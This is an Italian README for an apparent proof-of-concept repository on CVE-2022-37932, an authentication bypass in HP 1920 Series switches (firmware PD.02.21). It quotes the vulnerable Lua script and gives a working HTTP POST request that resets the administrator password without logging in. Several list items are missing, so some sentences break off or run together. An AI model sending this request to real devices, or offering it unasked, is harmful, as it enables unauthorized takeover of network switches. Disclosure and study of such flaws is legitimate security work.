
Proof-of-concept exploit e analisi tecnica per CVE-2022-37932, una vulnerabilità di bypass dell'autenticazione negli switch Smart Managed HP Serie 1920 che consente la modifica non autenticata della password di amministratore.
Versione firmware: PD.02.21
Dispositivi interessati: Switch Smart Managed Serie HP 1920
Questo repository documenta una vulnerabilità critica di bypass dell'autenticazione negli Switch Smart Managed Serie HP 1920 con versione firmware PD.02.21. La vulnerabilità consente a un utente non autenticato di modificare la password dell'amministratore senza previa autenticazione, permettendo di fatto il completo controllo del dispositivo.
La vulnerabilità risiede nello script /login/default_password_cfg.lua, che gestisce la modifica della password predefinita del dispositivo. Questo script:
oldPwd corrisponda alla password predefinita (che è vuota)La sezione chiave vulnerabile in default_password_cfg.lua:
if (request_method == 'POST') then
-- Nessun controllo di autenticazione o sessione!
local defaultPassword = fpaux.string_const("FD_USER_MGR_DEFAULT_PASSWORD")
-- ...
if form_post.oldPwd ~= defaultPassword then
errorStatus = "401 Unauthorized"
errorText = label.old_password_mismatch
else
-- Procede a modificare la password
-- ...
end
end
Lo script è privo dei controlli di sicurezza critici:
Un attaccante può sfruttare questa vulnerabilità inviando una semplice richiesta HTTP POST:
POST /login/default_password_cfg.lua HTTP/1.1
Host: [target-ip]
Content-Type: application/x-www-form-urlencoded
Content-Length: [length]
username=admin&oldPwd=&newPwd=[new-password]&confirmPwd=[new-password]
Nota: Il parametro oldPwd viene lasciato vuoto poiché la password predefinita è vuota.
Questa vulnerabilità consente a un utente non autenticato di:
Non ho avuto il tempo di cercare chi ha scoperto originariamente questa vulnerabilità, sto solo pubblicando una prova di concetto.
Queste informazioni sono fornite solo a scopo educativo. L'autore non è responsabile per qualsiasi uso improprio di queste informazioni. Ottenere sempre l'autorizzazione appropriata prima di testare le vulnerabilità.